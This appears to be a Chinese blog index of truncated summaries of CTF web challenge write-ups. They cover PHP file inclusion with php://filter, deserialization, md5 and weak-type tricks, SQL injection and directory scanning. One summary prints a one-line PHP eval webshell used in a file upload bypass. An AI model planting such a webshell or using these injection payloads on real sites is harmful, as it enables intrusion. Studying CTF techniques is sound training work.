摘要:
打开页面,测试功能发现是一个鼓励网站,点击下面的两个按钮会给category传一个参数 感觉存在文件包含漏洞,先用base64伪协议尝试读取一下源码 ?category=php://filter/convert.base64-encode/resource=index.php 发现报错了嗷,根据提示 阅读全文
摘要:
访问网站的robots.txt,看看有没有线索 找到了user.php的源码,直接访问这个备份文件。下载完成直接打开用就好,记事本就可以打开.bak文件 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = 阅读全文
摘要:
打开输入字符后提交没有回显,查看header发现有hint。重点是md5函数,用法: md5(*string*, *raw*=FALSE),当只接受一个参数时会返回字符串的md5值,当把第二个参数的值设置为TRUE,会返回生成md5值的二进制格式,即根据ascii码值转码。 根据这个特性,就存在一个 阅读全文
摘要:
点击右上角的菜单,有一个payflag,直接点击,进入到了pay.php页面 发现,需要得到flag有两个要求:必须是该校的学生,密码必须正确。 在该页面的网页底部,有代码提示,要求密码不能是纯数字,最后又要==404密码才正确。我们可以想到利用php的弱类型比较:只要前缀有404就好。 那需要做的 阅读全文
摘要:
打开是一个计算器 查看网页源码发现,程序通过调用clac.php文件给num传参再计算,其中encodeURIComponent函数对计算表达式中的符号进行转码。例如表达式为1+1,则返回1%2B1,故url为calc.php?num=1%2B1。另外这里还提示我们他已经部署了waf,waf会过滤一 阅读全文
摘要:
使用dirsearch扫描: dirsearch -u http://b31cefa6-24d4-4f14-82c3-0fdba166cecf.node5.buuoj.cn:81/ -e bak -t 1 -d 1 -o ./reports/buuoj.txt 扫描结果为: 文件扫描得到命令inde 阅读全文
摘要:
dirsearch扫描网站目录,对扫描到的结果用grep查找200的结果 发现有一个www.zip网站备份文件,访问www.zip,下载之后对代码进行审计, 查看flag.php,结果不对。 index.php有一段include调用 审计class.php <?php include 'flag. 阅读全文
摘要:
打开页面是一个登录界面,直接用admin’ or 1#试试深浅 回显为: 这里我们分析一下这个报错,near后跟的单引号中的内容为1#' and password='a',那么说明sql语句就是从这里开始语法不正确的,模拟一下正常的sql应该是select * from table where us 阅读全文
摘要:
打开页面,点击灯泡出现上传按钮 上传phtml_get.phtml的shell文件,文件内容为: GIF89a <script language='php'>@eval($_GET['aa']);</script> 访问文件,使用system命令查看/upload/phtml_get.phtml?a 阅读全文